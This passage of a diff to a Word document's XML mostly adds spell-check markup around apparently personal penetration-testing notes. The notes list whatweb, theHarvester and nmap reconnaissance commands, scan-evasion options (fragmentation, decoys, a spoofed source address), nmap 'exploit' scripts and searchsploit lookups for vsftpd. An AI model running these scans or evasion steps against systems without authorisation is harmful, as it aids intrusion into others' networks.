               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>whatweb 192</w:t>
-            </w:r>
+              <w:t>whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve"> 192</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>.168.1.4-192.168.1.255</w:t>
             </w:r>
             <w:r>
@@ -962,12 +1054,14 @@
               </w:rPr>
               <w:t>-</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>theHarvester</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -997,12 +1091,26 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
-            </w:r>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t>theHarvester</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -d erertech.com </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>-b all</w:t>
             </w:r>
           </w:p>
@@ -1073,9 +1181,11 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:t>Redhawk(</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:t>software tools</w:t>
             </w:r>
@@ -1095,13 +1205,23 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo apt install python-pip</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1360,13 +1480,31 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo netdiscover</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>netdiscover</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1437,6 +1575,7 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -1444,7 +1583,11 @@
               <w:t>Nmap</w:t>
             </w:r>
             <w:r>
-              <w:t>(Checking PORTS)</w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>Checking PORTS)</w:t>
             </w:r>
             <w:r>
               <w:t>- Sometimes it takes hours to scan.</w:t>
@@ -1461,7 +1604,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">You have to put </w:t>
+              <w:t xml:space="preserve">You </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>have to</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> put </w:t>
             </w:r>
             <w:r>
               <w:t>this</w:t>
@@ -1588,7 +1739,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -sS {IPADDRESS}</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1619,8 +1786,29 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sU</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1636,7 +1824,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -s</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>s</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1645,6 +1841,7 @@
               </w:rPr>
               <w:t>T</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1685,8 +1882,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>man nmap</w:t>
-            </w:r>
+              <w:t xml:space="preserve">man </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – manual, really helps!</w:t>
             </w:r>
@@ -1737,14 +1942,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
             </w:r>
             <w:r>
               <w:t>O</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1771,8 +1997,37 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1783,24 +2038,115 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo nmap -A {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>nmap -sn {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -A {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
             <w:r>
               <w:t>-255</w:t>
@@ -1814,12 +2160,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1840,7 +2195,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1889,8 +2260,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -f {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -1911,6 +2303,7 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1923,7 +2316,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">(flood </w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">flood </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1942,17 +2343,46 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{ipaddress}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -sS</w:t>
-            </w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -1963,6 +2393,7 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1975,7 +2406,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">(flood – when scanning </w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">flood – when scanning </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1994,10 +2433,58 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, D {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2044,8 +2531,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Pn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2116,12 +2624,27 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo </w:t>
-            </w:r>
-            <w:r>
-              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2138,14 +2661,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
+              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2156,8 +2700,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2166,8 +2731,29 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2192,9 +2778,19 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2205,11 +2801,32 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>anon.nse</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2245,8 +2862,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>searchploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2268,8 +2893,37 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2281,7 +2935,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (vsftpd 2.3.)</w:t>
+              <w:t>Find version (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>vsftpd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2293,7 +2955,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Google it if theres already existing exploitation</w:t>
+              <w:t xml:space="preserve">Google it if </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>theres</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> already existing exploitation</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2305,8 +2975,13 @@
             <w:pPr>
               <w:ind w:firstLine="720"/>
             </w:pPr>
-            <w:r>
-              <w:t>Searchsploit {version}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2498,12 +3173,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Metaploit Framework Structure</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Metaploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Framework Structure</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2534,7 +3218,23 @@
                 <w:b/>
